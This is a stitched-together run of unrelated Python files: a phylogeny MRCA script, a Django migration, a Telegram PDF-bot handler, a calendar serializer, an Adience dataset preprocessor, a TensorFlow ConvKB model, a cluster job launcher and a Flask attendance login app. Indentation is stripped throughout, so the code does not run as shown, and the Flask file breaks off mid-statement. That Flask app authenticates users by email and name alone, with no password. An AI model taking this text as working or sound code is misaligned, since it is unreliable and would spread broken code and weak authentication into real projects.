"kohI, kohhi7 “small intestine, waist, abdomen”"
"ĩík [swell], pux [pot boil over]"
|
import json, csv, os, argparse
def main():
parser = argparse.ArgumentParser(description='Using a standard JSON-formatted phylogeny file, finds the time to the most recent common ancestor for the oldest organisms in the file. origin_time is used to find the oldest organisms and to establish the time axis.')
parser.add_argument('-path', type=str, metavar='PATH', default = '', help='path to files - default : none (will read files in current directory)', required=False)
parser.add_argument('-file', type=str, metavar='NAME', default = 'lineageData.json', help='name of data file. default : lineageData.json', required=False)
parser.add_argument('-verbose', action='store_true', default = False, help='adding this flag will provide more text output while running (useful if you are working with a lot of data to make sure that you are not hanging) - default (if not set) : OFF', required=False)
args = parser.parse_args()
filePath = args.path
filename = args.file
fileName = filePath + filename
with open(filePath+filename, 'r') as fp:
data = json.load(fp)
parentData = {}
birthData = {}
lastBirthDate = -1
lineNumber = 0
print("loading data",end='')
for key in data:
if lineNumber%10000 == 0:
print('.',end='',flush=True)
lineNumber += 1
parentData[int(key)] = [int(p) for p in data[key]['ancestor_list']]
parentData[int(key)].sort()
birthData[int(key)] = int(data[key]['origin_time'])
lastBirthDate = max(lastBirthDate,birthData[int(key)])
print() # newline after all data has been loaded
print('last orgs were born at time',lastBirthDate,flush=True)
lastGenerationAncestors = {}
for ID in birthData:
if birthData[ID] == lastBirthDate:
lastGenerationAncestors[ID] = parentData[ID]
parentList = []
for ID in lastGenerationAncestors:
parentList.append(ID)
while 1:
if(args.verbose):
print("at time",birthData[parentList[0]],"... considering",len(parentList),"orgs.",parentList,flush = True)
newParentList = []
foundUnique = False # we have not found any unique parents lists
first = True
firstParentsList = []
for ID in parentList:
if first:
firstParentsList = parentData[ID]
first = False
else:
if parentData[ID] != firstParentsList:
foundUnique = True # we are not done
for parent in parentData[ID]:
if parent not in newParentList:
newParentList.append(parent)
parentList = newParentList
if(birthData[parentList[0]] == -1):
print('reached organism with time of birth -1. There is no MRCA(s)')
exit(1)
if not foundUnique: # all orgs do have the same parents list
oldestBirth = min([birthData[x] for x in parentList])
print('\nCoalescence found at time', oldestBirth, '\n ', lastBirthDate - oldestBirth,'time steps before oldest organism was born.\nMRCA(s) has ID(s):',parentList)
exit(1)
if __name__ == "__main__":
main()
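# Example invocation (illustrative; the script name, path and data file are placeholders):
#   python find_mrca.py -path ./run_01/ -file lineageData.json -verbose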
|
import urllib.parse
def query_field(query, field):
field_spec = field in query
return (field_spec, query[field] if field_spec else '')
def unpack_id_list(l):
return [int(x) for x in
[_f for _f in urllib.parse.unquote_plus(l).split(',') if _f]]
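# Hedged usage sketch (not part of the original module):
#   unpack_id_list('12%2C34%2C56')        -> [12, 34, 56]
#   query_field({'ids': '1,2'}, 'ids')    -> (True, '1,2')
#   query_field({}, 'ids')                -> (False, '')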
|
# Generated by Django 2.2 on 2019-06-24 14:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("audits", "0010_auto_20190410_2241")]
operations = [
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_contentful_paint_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_contentful_paint_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_cpu_idle_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_cpu_idle_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_meaningful_paint_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_meaningful_paint_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_max_potential_first_input_delay_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_max_potential_first_input_delay_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_speed_index_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_speed_index_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_tti_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_tti_score",
field=models.FloatField(blank=True, null=True),
),
]
|
from telegram.constants import MAX_FILESIZE_DOWNLOAD
from telegram.ext import CommandHandler, ConversationHandler, Filters, MessageHandler
from pdf_bot.consts import (
BACK,
BEAUTIFY,
BY_PERCENT,
BY_SIZE,
CANCEL,
COMPRESS,
COMPRESSED,
CROP,
DECRYPT,
ENCRYPT,
EXTRACT_PHOTO,
EXTRACT_TEXT,
OCR,
PDF_INFO,
PHOTOS,
PREVIEW,
RENAME,
ROTATE,
SCALE,
SPLIT,
TEXT_FILE,
TEXT_FILTER,
TEXT_MESSAGE,
TO_DIMENSIONS,
TO_PDF,
TO_PHOTO,
WAIT_CROP_OFFSET,
WAIT_CROP_PERCENT,
WAIT_CROP_TYPE,
WAIT_DECRYPT_PW,
WAIT_DOC_TASK,
WAIT_ENCRYPT_PW,
WAIT_EXTRACT_PHOTO_TYPE,
WAIT_FILE_NAME,
WAIT_PHOTO_TASK,
WAIT_ROTATE_DEGREE,
WAIT_SCALE_DIMENSION,
WAIT_SCALE_PERCENT,
WAIT_SCALE_TYPE,
WAIT_SPLIT_RANGE,
WAIT_TEXT_TYPE,
WAIT_TO_PHOTO_TYPE,
)
from pdf_bot.files.compress import compress_pdf
from pdf_bot.files.crop import (
ask_crop_type,
ask_crop_value,
check_crop_percent,
check_crop_size,
)
from pdf_bot.files.crypto import (
ask_decrypt_pw,
ask_encrypt_pw,
decrypt_pdf,
encrypt_pdf,
)
from pdf_bot.files.document import ask_doc_task
from pdf_bot.files.ocr import add_ocr_to_pdf
from pdf_bot.files.photo import (
ask_photo_results_type,
ask_photo_task,
get_pdf_photos,
get_pdf_preview,
pdf_to_photos,
process_photo_task,
)
from pdf_bot.files.rename import ask_pdf_new_name, rename_pdf
from pdf_bot.files.rotate import ask_rotate_degree, check_rotate_degree
from pdf_bot.files.scale import (
ask_scale_type,
ask_scale_value,
check_scale_dimension,
check_scale_percent,
)
from pdf_bot.files.split import ask_split_range, split_pdf
from pdf_bot.files.text import ask_text_type, get_pdf_text
from pdf_bot.language import set_lang
from pdf_bot.utils import cancel
def file_cov_handler():
conv_handler = ConversationHandler(
entry_points=[
MessageHandler(Filters.document, check_doc),
MessageHandler(Filters.photo, check_photo),
],
states={
WAIT_DOC_TASK: [MessageHandler(TEXT_FILTER, check_doc_task)],
WAIT_PHOTO_TASK: [MessageHandler(TEXT_FILTER, check_photo_task)],
WAIT_CROP_TYPE: [MessageHandler(TEXT_FILTER, check_crop_task)],
WAIT_CROP_PERCENT: [MessageHandler(TEXT_FILTER, check_crop_percent)],
WAIT_CROP_OFFSET: [MessageHandler(TEXT_FILTER, check_crop_size)],
WAIT_DECRYPT_PW: [MessageHandler(TEXT_FILTER, decrypt_pdf)],
WAIT_ENCRYPT_PW: [MessageHandler(TEXT_FILTER, encrypt_pdf)],
WAIT_FILE_NAME: [MessageHandler(TEXT_FILTER, rename_pdf)],
WAIT_ROTATE_DEGREE: [MessageHandler(TEXT_FILTER, check_rotate_degree)],
WAIT_SPLIT_RANGE: [MessageHandler(TEXT_FILTER, split_pdf)],
WAIT_TEXT_TYPE: [MessageHandler(TEXT_FILTER, check_text_task)],
WAIT_SCALE_TYPE: [MessageHandler(TEXT_FILTER, check_scale_task)],
WAIT_SCALE_PERCENT: [MessageHandler(TEXT_FILTER, check_scale_percent)],
WAIT_SCALE_DIMENSION: [MessageHandler(TEXT_FILTER, check_scale_dimension)],
WAIT_EXTRACT_PHOTO_TYPE: [
MessageHandler(TEXT_FILTER, check_get_photos_task)
],
WAIT_TO_PHOTO_TYPE: [MessageHandler(TEXT_FILTER, check_to_photos_task)],
},
fallbacks=[CommandHandler("cancel", cancel)],
allow_reentry=True,
)
return conv_handler
def check_doc(update, context):
doc = update.effective_message.document
if doc.mime_type.startswith("image"):
return ask_photo_task(update, context, doc)
if not doc.mime_type.endswith("pdf"):
return ConversationHandler.END
if doc.file_size >= MAX_FILESIZE_DOWNLOAD:
_ = set_lang(update, context)
update.effective_message.reply_text(
"{desc_1}\n\n{desc_2}".format(
desc_1=_("Your file is too big for me to download and process"),
desc_2=_(
"Note that this is a Telegram Bot limitation and there's "
"nothing I can do unless Telegram changes this limit"
),
),
)
return ConversationHandler.END
context.user_data[PDF_INFO] = doc.file_id, doc.file_name
return ask_doc_task(update, context)
def check_photo(update, context):
return ask_photo_task(update, context, update.effective_message.photo[-1])
def check_doc_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text == _(CROP):
return ask_crop_type(update, context)
if text == _(DECRYPT):
return ask_decrypt_pw(update, context)
if text == _(ENCRYPT):
return ask_encrypt_pw(update, context)
if text in [_(EXTRACT_PHOTO), _(TO_PHOTO)]:
return ask_photo_results_type(update, context)
if text == _(PREVIEW):
return get_pdf_preview(update, context)
if text == _(RENAME):
return ask_pdf_new_name(update, context)
if text == _(ROTATE):
return ask_rotate_degree(update, context)
if text in [_(SCALE)]:
return ask_scale_type(update, context)
if text == _(SPLIT):
return ask_split_range(update, context)
if text == _(EXTRACT_TEXT):
return ask_text_type(update, context)
if text == OCR:
return add_ocr_to_pdf(update, context)
if text == COMPRESS:
return compress_pdf(update, context)
if text == _(CANCEL):
return cancel(update, context)
return WAIT_DOC_TASK
def check_photo_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BEAUTIFY), _(TO_PDF)]:
return process_photo_task(update, context)
if text == _(CANCEL):
return cancel(update, context)
return WAIT_PHOTO_TASK
def check_crop_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BY_PERCENT), _(BY_SIZE)]:
return ask_crop_value(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_CROP_TYPE
def check_scale_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BY_PERCENT), _(TO_DIMENSIONS)]:
return ask_scale_value(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_SCALE_TYPE
def check_text_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text == _(TEXT_MESSAGE):
return get_pdf_text(update, context, is_file=False)
if text == _(TEXT_FILE):
return get_pdf_text(update, context, is_file=True)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_TEXT_TYPE
def check_get_photos_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(PHOTOS), _(COMPRESSED)]:
return get_pdf_photos(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_EXTRACT_PHOTO_TYPE
def check_to_photos_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(PHOTOS), _(COMPRESSED)]:
return pdf_to_photos(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_TO_PHOTO_TYPE
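# Hedged wiring sketch (assumes a python-telegram-bot v13-style Updater/Dispatcher, which
# matches the Filters/MessageHandler imports above; the bot token below is a placeholder):
#
#   from telegram.ext import Updater
#
#   updater = Updater("BOT_TOKEN")
#   updater.dispatcher.add_handler(file_cov_handler())
#   updater.start_polling()
#   updater.idle()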
|
from recurrent_ics.grammar.parse import ContentLine
from recurrent_ics.serializers.serializer import Serializer
class CalendarSerializer(Serializer):
def serialize_0version(calendar, container): # 0version will be sorted first
container.append(ContentLine("VERSION", value="2.0"))
def serialize_1prodid(calendar, container): # 1prodid will be sorted second
if calendar.creator:
creator = calendar.creator
else:
creator = "recurrent_ics.py - http://git.io/lLljaA"
container.append(ContentLine("PRODID", value=creator))
def serialize_calscale(calendar, container):
if calendar.scale:
container.append(ContentLine("CALSCALE", value=calendar.scale.upper()))
def serialize_method(calendar, container):
if calendar.method:
container.append(ContentLine("METHOD", value=calendar.method.upper()))
def serialize_event(calendar, container):
for event in calendar.events:
container.append(str(event))
def serialize_todo(calendar, container):
for todo in calendar.todos:
container.append(str(todo))
|
import h5py, cv2, os, random, argparse
from tqdm import tqdm
import numpy as np
class Process:
def __init__(self, data_path=None, filename=None):
self.filename = filename
self.data_path = data_path
self.prefix = "landmark_aligned_face." # every image name is prefixed with this string
# 5 folders to loop over, each folder text file contains information of other folders
self.folder_files = ['fold_0_data.txt', 'fold_1_data.txt', 'fold_2_data.txt', 'fold_3_data.txt',
'fold_4_data.txt']
# age category classes, there are 12 age groups
self.ages = ["(0, 2)", "(4, 6)", "(8, 12)", "(15, 20)", "(21, 24)", "(25, 32)",
"(33, 37)", "(38, 43)", "(44, 47)", "(48, 53)", "(54, 59)", "(60, 100)"]
# there are only 2 gender categories
self.genders = ['m', 'f']
# Since there are labels that do not match the classes stated, need to fix them
self.ages_to_fix = {'35': self.ages[6], '3': self.ages[0], '55': self.ages[10], '58': self.ages[10],
'22': self.ages[4], '13': self.ages[2], '45': self.ages[8], '36': self.ages[6],
'23': self.ages[4], '57': self.ages[10], '56': self.ages[10], '2': self.ages[0],
'29': self.ages[5], '34': self.ages[6], '42': self.ages[7], '46': self.ages[8],
'32': self.ages[5], '(38, 48)': self.ages[7], '(38, 42)': self.ages[7],
'(8, 23)': self.ages[2], '(27, 32)': self.ages[5]}
self.none_count = 0
self.no_age = 0
def get_image_paths(self, folder_file):
# one big folder list
folder = list()
folder_path = os.path.join(self.data_path, folder_file)
# start processing each folder text file
with open(folder_path) as text:
lines = text.readlines()
print("Total lines to be parsed from this document: ", len(lines))
# loop over all the lines ignoring the first line which contains metadata of the file contents
for line in lines[1:]:
line = line.strip().split("\t") # strip tab character from each line
# line[0] contains folder name, line[2] gives information of image id, line[1] gives exact image name
# construct image path with above information
img_path = line[0] + "/" + self.prefix + line[2] + "." + line[1] # real image path
# If the age group is not provided ("None"), increment the None counter and skip this image.
# Likewise, if the gender is unknown ("u") or missing, skip the image.
if line[3] == "None":
self.none_count += 1
continue
if line[4] == "u" or line[4] == "":
self.no_age += 1
continue
# Store useful metadata: for every valid image, append its path along with the age and gender labels.
folder.append([img_path] + line[3:5])
if folder[-1][1] in self.ages_to_fix:
folder[-1][1] = self.ages_to_fix[folder[-1][1]]
random.shuffle(folder)
return folder
def imread(self, path, width, height):
img = cv2.imread(path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA)
return img
def aggregate_data(self, all_folders):
width, height = 227, 227
# loop for reading imgs from five folders
all_data = []
all_ages = []
all_genders = []
print("Start reading images data...")
for ind, folder in enumerate(all_folders):
data = []
ages = []
genders = []
for i in tqdm(range(len(folder))): # here using tqdm to monitor progress
img_path = self.data_path + os.path.join("/aligned", folder[i][0])
img = self.imread(img_path, width, height)
data.append(img)
ages.append(self.ages.index(folder[i][1]))
genders.append(self.genders.index(folder[i][2]))
all_data.append(data)
all_ages.append(ages)
all_genders.append(genders)
print("Finished processing folder {}".format(str(ind)))
print("All done!")
all_data = np.concatenate(all_data)
all_ages = np.concatenate(all_ages)
all_genders = np.concatenate(all_genders)
return all_data, all_ages, all_genders
def split_data_from_dirs(self, data, ages, genders, split):
"""
this function takes in data, labels and % of training data to be used. since % of data for training varies based on
applications we keep that parameter user configurable.
:param data: 4D numpy array of images in (num samples, width, height, channels) format
:param labels: 1D numpy array storing labels for corresponding images
:param split: percentage of data to be used for training
:return: return the splits of training and testing along with labels
"""
print("Number of images in the training data: {}".format(str(data.shape[0])))
print("Ages/Genders: {}".format(str(ages.shape)))
# multiply split percentage with total images length and floor the result. Also cast into int, for slicing array
split_factor = int(np.floor(split * data.shape[0])) # number of images to be kept in training data
print("Using {} images for training and {} images for testing!".format(str(split_factor),
str(data.shape[0] - split_factor)))
x_train = data[:split_factor, :, :, :].astype("float")
x_test = data[split_factor:, :, :, :].astype("float")
y_train_age = ages[:split_factor]
y_test_age = ages[split_factor:]
y_train_gender = genders[:split_factor]
y_test_gender = genders[split_factor:]
print("Training data shape: {}".format(str(x_train.shape)))
print("Testing data shape: {}".format(str(x_test.shape)))
print("Training Age labels shape: {}".format(str(y_train_age.shape)))
print("Testing Age labels shape: {}".format(str(y_test_age.shape)))
print("Training Gender labels shape: {}".format(str(y_train_gender.shape)))
print("Testing Gender labels shape: {}".format(str(y_test_gender.shape)))
return x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender
def generate_h5(self, Xtr, Xtst, ytr_age, ytst_age, ytr_gen, ytst_gen):
print("Generating H5 file...")
hf = h5py.File(self.filename, 'w')
hf.create_dataset('x_train', data=Xtr, compression="gzip")
hf.create_dataset('x_test', data=Xtst, compression="gzip")
hf.create_dataset('y_train_age', data=ytr_age, compression="gzip")
hf.create_dataset('y_test_age', data=ytst_age, compression="gzip")
hf.create_dataset('y_train_gender', data=ytr_gen, compression="gzip")
hf.create_dataset('y_test_gender', data=ytst_gen, compression="gzip")
hf.close()
print("H5 file generated successfully")
def helper(self):
# looping over all the folder text files to aggregate the image paths
all_folders = []
for folder_file in self.folder_files:
folder = self.get_image_paths(folder_file)
all_folders.append(folder)
# print("A sample:", all_folders[0][0])
print("No. of Pics without Age Group Label:", self.none_count)
# total data received after aggregating
data, ages, genders = self.aggregate_data(all_folders)
print("Aggregated data shape: {}".format(str(data.shape)))
print("Aggregated age shape: {}".format(str(ages.shape)))
print("Aggregated genders shape: {}".format(str(genders.shape)))
# splitting data into training and testing based on percentage. split is amount of training data to be used
split = 0.95
x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender = self.split_data_from_dirs(data, ages,
genders,
split)
# encapsulating data into h5 files
self.generate_h5(x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Use this script to process dataset.')
parser.add_argument('-p', '--path', type=str, required=True,
default=os.path.join(os.getenv("HOME"), "data/adience"),
help='Path to raw dataset file to be processed.')
parser.add_argument('-o', '--save', type=str, required=True,
default=os.path.join(os.getenv("HOME"), "data/adience/adience.h5"),
help='Path to save the .h5 file')
args = parser.parse_args()
p = Process(args.path, args.save)
p.helper()
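# Invocation sketch (illustrative; the script name and paths below are hypothetical,
# only the -p/--path and -o/--save flags come from the argparse definition above):
#
#   python process_adience.py -p ~/data/adience -o ~/data/adience/adience.h5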
|
from sqlalchemy.dialects.sybase import base, pysybase, pyodbc
from sqlalchemy.dialects.sybase.base import CHAR, VARCHAR, TIME, NCHAR, NVARCHAR,\
                        TEXT, DATE, DATETIME, FLOAT, NUMERIC,\
                        BIGINT, INT, INTEGER, SMALLINT, BINARY,\
                        VARBINARY, UNITEXT, UNICHAR, UNIVARCHAR,\
                        IMAGE, BIT, MONEY, SMALLMONEY, TINYINT
# default dialect
base.dialect = pyodbc.dialect
__all__ = (
'CHAR', 'VARCHAR', 'TIME', 'NCHAR', 'NVARCHAR',
'TEXT','DATE','DATETIME', 'FLOAT', 'NUMERIC',
'BIGINT','INT', 'INTEGER', 'SMALLINT', 'BINARY',
'VARBINARY','UNITEXT','UNICHAR','UNIVARCHAR',
'IMAGE','BIT','MONEY','SMALLMONEY','TINYINT',
'dialect'
)
|
import os
import binascii
# Use os.urandom() to create a secret key and print it in ASCII (hex) form
secret_key = os.urandom(32)
print(secret_key)
print(binascii.hexlify(secret_key))
# secret_key2 = os.urandom(1)
# print(secret_key2)
# print(binascii.hexlify(b'0'))
# print(int(binascii.hexlify(b'0'),16))
# print(int('bdd03cb27bfd5c61254e693f246a0a2ee9dc66ac698936d5d932fafe6012f1d5',16))
# print(bin(int('bdd03cb27bfd5c61254e693f246a0a2ee9dc66ac698936d5d932fafe6012f1d5',16))) |
import os
import sys
from pbstools import PythonJob
import getopt
import numpy as np
import glob
import h5py
import time
import shutil
def main(argv):
opts, args = getopt.getopt(
argv,
[],
[
"output_folder=",
"model_file=",
"start_frame=",
"end_frame=",
"pre_frame=",
"post_frame=",
"nb_jobs=",
"h5_file=",
],
)
for opt, arg in opts:
if opt == "--output_folder":
output_folder = arg
if opt == "--model_file":
model_file = arg
if opt == "--start_frame":
start_frame = int(arg)
if opt == "--end_frame":
end_frame = int(arg)
if opt == "--pre_frame":
pre_frame = int(arg)
if opt == "--post_frame":
post_frame = int(arg)
if opt == "--nb_jobs":
nb_jobs = int(arg)
if opt == "--h5_file":
h5_file = arg
try:
os.mkdir(output_folder)
except:
print("Folder already created")
batch_size = 5
# We infer the movie in chunks
    block_size = int(np.ceil((end_frame - start_frame) / nb_jobs))
# We force block_size to be a multiple of batch size
block_size = int(np.floor(block_size / batch_size) * batch_size)
jobdir = os.path.join(
output_folder, "tmp_" +
os.path.splitext(os.path.basename(model_file))[0]
)
try:
os.mkdir(jobdir)
except:
print("Folder already created")
files = glob.glob(os.path.join(jobdir, "*"))
for f in files:
os.remove(f)
python_file = "/home/jeromel/Documents/Projects/Deep2P/repos/deepinterpolation/examples/cluster_lib/single_ophys_section_inferrence.py"
list_files_check = []
for index, local_start_frame in enumerate(
np.arange(start_frame, end_frame, block_size)
):
local_path = os.path.join(jobdir, "movie_" + str(index) + ".hdf5")
local_end_frame = np.min(
[end_frame, local_start_frame + block_size - 1])
job_settings = {
"queue": "braintv",
"mem": "180g",
"walltime": "48:00:00",
"ppn": 16,
}
out_file = os.path.join(jobdir, "$PBS_JOBID.out")
list_files_check.append(local_path + ".done")
job_settings.update(
{
"outfile": out_file,
"errfile": os.path.join(jobdir, "$PBS_JOBID.err"),
"email": "[email protected]",
"email_options": "a",
}
)
arg_to_pass = [
"--movie_path "
+ h5_file
+ " --frame_start "
+ str(local_start_frame)
+ " --frame_end "
+ str(local_end_frame)
+ " --output_file "
+ local_path
+ " --model_file "
+ model_file
+ " --batch_size "
+ str(batch_size)
+ " --pre_frame "
+ str(pre_frame)
+ " --post_frame "
+ str(post_frame)
]
PythonJob(
python_file,
python_executable="/allen/programs/braintv/workgroups/nc-ophys/Jeromel/conda/tf20-env/bin/python",
conda_env="/allen/programs/braintv/workgroups/nc-ophys/Jeromel/conda/tf20-env",
jobname="movie_2p",
python_args=arg_to_pass[0],
**job_settings
).run(dryrun=False)
# We wait for the jobs to complete
stay_in_loop = True
while stay_in_loop:
time.sleep(60)
nb_file = 0
for indiv_file in list_files_check:
if os.path.isfile(indiv_file):
nb_file += 1
if nb_file == len(list_files_check):
stay_in_loop = False
# We merge the files
output_merged = os.path.join(
output_folder, "movie_" + os.path.basename(model_file))
list_files = glob.glob(os.path.join(jobdir, "*.hdf5"))
list_files = sorted(
list_files, key=lambda x: int(x.split("movie_")[1].split(".hdf5")[0])
)
nb_frames = 0
for each_file in list_files:
with h5py.File(each_file, "r") as file_handle:
local_shape = file_handle["data"].shape
nb_frames = nb_frames + local_shape[0]
final_shape = list(local_shape)
final_shape[0] = nb_frames
global_index_frame = 0
with h5py.File(output_merged, "w") as file_handle:
dset_out = file_handle.create_dataset(
"data",
shape=final_shape,
chunks=(1, final_shape[1], final_shape[2]),
dtype="float16",
)
for each_file in list_files:
with h5py.File(each_file, "r") as file_handle:
local_shape = file_handle["data"].shape
                dset_out[
                    global_index_frame: global_index_frame + local_shape[0]
                ] = file_handle["data"][:]
global_index_frame += local_shape[0]
shutil.rmtree(jobdir)
if __name__ == "__main__":
main(sys.argv[1:])
|
import tensorflow as tf
import numpy as np
import math
class ConvKB(object):
def __init__(self, sequence_length, num_classes, embedding_size, filter_sizes, num_filters, vocab_size,
pre_trained=[], l2_reg_lambda=0.001, is_trainable=True, useConstantInit=False):
# Placeholders for input, output and dropout
self.input_x = tf.compat.v1.placeholder(
tf.int32, [None, sequence_length], name="input_x")
self.input_y = tf.compat.v1.placeholder(
tf.float32, [None, num_classes], name="input_y")
self.dropout_keep_prob = tf.compat.v1.placeholder(
tf.float32, name="dropout_keep_prob")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.name_scope("embedding"):
if pre_trained == []:
self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -math.sqrt(
1.0/embedding_size), math.sqrt(1.0/embedding_size), seed=1234), name="W")
else:
# trainable=is_trainable)
self.W = tf.Variable(name="W2", initial_value=pre_trained)
self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)
self.embedded_chars_expanded = tf.expand_dims(
self.embedded_chars, -1)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s" % filter_size):
if useConstantInit == False:
filter_shape = [sequence_length,
filter_size, 1, num_filters]
W = tf.Variable(tf.compat.v1.random.truncated_normal(
filter_shape, stddev=0.1, seed=1234), name="W")
else:
init1 = tf.constant([[[[0.1]]], [[[0.1]]], [[[-0.1]]]])
weight_init = tf.tile(
init1, [1, filter_size, 1, num_filters])
W = tf.get_variable(name="W3", initializer=weight_init)
b = tf.Variable(tf.constant(
0.0, shape=[num_filters]), name="b")
conv = tf.nn.conv2d(
self.embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
pooled_outputs.append(h)
# Combine all the pooled features
self.h_pool = tf.concat(pooled_outputs, 2)
total_dims = (embedding_size * len(filter_sizes) -
sum(filter_sizes) + len(filter_sizes)) * num_filters
self.h_pool_flat = tf.reshape(self.h_pool, [-1, total_dims])
# Add dropout
with tf.name_scope("dropout"):
self.h_drop = tf.nn.dropout(
self.h_pool_flat, self.dropout_keep_prob)
# Final (unnormalized) scores and predictions
with tf.name_scope("output"):
W = tf.compat.v1.get_variable(
"W",
shape=[total_dims, num_classes],
initializer=tf.contrib.layers.xavier_initializer(seed=1234))
b = tf.Variable(tf.constant(0.0, shape=[num_classes]), name="b")
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name="scores")
self.predictions = tf.nn.sigmoid(self.scores)
# Calculate loss
with tf.name_scope("loss"):
losses = tf.nn.softplus(self.scores * self.input_y)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=500)
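# Instantiation sketch (illustrative only; the hyper-parameter values below are
# assumptions for demonstration, not taken from an original training script):
#
# model = ConvKB(sequence_length=3, num_classes=1, embedding_size=100,
#                filter_sizes=[1], num_filters=64, vocab_size=40000,
#                pre_trained=[], l2_reg_lambda=0.001, useConstantInit=False)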
|
import secrets
import datetime
import time
from flask import Flask, render_template, redirect, url_for, request, make_response
from LoginInfo import LoginInfo
import displayManager as dm
import numpy as np
path = "C:/Users/132/Desktop/WebServer/" #Change this if not me
app = Flask(__name__,template_folder= path+"templates")
#(cmd prompt reminder)---
#set FLASK_APP=C:/Users/132/Desktop/WebServer/Main
#flask run
#---
@app.route("/", methods=['GET', 'POST'])
def Login():
global path
if request.method == 'POST':
message = ''
# fileObj = open(path+"Usernames.txt", "r")
#Usernames = fileObj.read().splitlines()
#fileObj.close()
fileObj = open(path+"LoginData.txt", "r")
LoginData = fileObj.read().splitlines()
fileObj.close()
sheet = []
c = 0
while(c<len(LoginData)):
sheet.append(LoginData[c].split(','))
c += 1
#
InfoSheet = np.array(sheet)
#if request.form['Username'] in Usernames:
# UserID = Usernames.index(request.form['Username'])
# if request.form['Password'] == Passwords[UserID]:
# message = 'Login successful. Something should happen now'
## out = render_template('login.html',message = message)
# response = make_response(redirect(url_for('Home')))
# Certificate = LoginInfo.WriteCertificate(path,UserID)
# response.set_cookie('Certificate',Certificate)
# out = response
        if(request.form['Email'] in InfoSheet[:,0]):
            z = InfoSheet[:,0].tolist().index(request.form['Email'])
            if(request.form['First'] == InfoSheet[z,1]):
                if(request.form['Last'] == InfoSheet[z,2]):
                    message = 'Login Successful'
                    response = make_response(redirect(url_for('Home')))
                    Certificate = LoginInfo.WriteCertificate(path,z)  # using the matched row index as the user id
                    response.set_cookie('Certificate',Certificate)
                    out = response
else:
message = 'Typo?'
out = render_template('login.html',message = message)
else:
message = 'Typo?'
out = render_template('login.html',message = message)
else:
message = 'Email not recognized.'
out = render_template('login.html',message = message)
else:
message = None
out = render_template('login.html',message = message)
return out
@app.route("/home", methods=['GET', 'POST'])
def Home():
global path
#currently generic. TODO: add more functionality and probably additional pages
Status,UserID = LoginInfo.GetStatus(path) #security
if(Status == "None"):
response = make_response(render_template('Error.html'))
if(Status == "Student"):
message = ""
Info = dm.InfoManager(path)
uTab,UserTime,first,last,IsHere = Info.GetUserData(UserID)
        if(request.method == 'POST'):
            now = datetime.datetime.now()
            CurrentTime = now.strftime("%H:%M:%S")
            CurrentDate = str(now.month)+str(now.day)
if(request.form['CheckIn']):
if(not IsHere):
nothing = Info.AdminOverride(CurrentTime,CurrentDate,UserID,Out = False)
else:
message = "You are already checked in."
elif(request.form['CheckOut']):
if(IsHere):
nothing = Info.AdminOverride(CurrentTime,CurrentDate,UserID,Out = True)
else:
message = "You are not currently checked in, so you may not check out."
        response = make_response(render_template('StudentHome.html', table = uTab, name = str(first)+str(last), message = message))
Certificate = LoginInfo.WriteCertificate(path,UserID) #new certificate
response.set_cookie('Certificate',Certificate)
if(Status == "Admin"):
Info = dm.InfoManager(path)
if(request.method == 'POST'):
response = make_response(redirect(url_for('Home')))
if(request.form['A']):
response.set_cookie('Disp','absent')
if(request.form['P']):
response.set_cookie('Disp','present')
if(request.form['C']):
response.set_cookie('Disp','checked out')
if(request.form['UserSearch']):
response.set_cookie('User',request.form['IDnumber'])
if(request.form['Session']):
response.set_cookie('From',request.form['Session'])
if(request.form['Clear']):
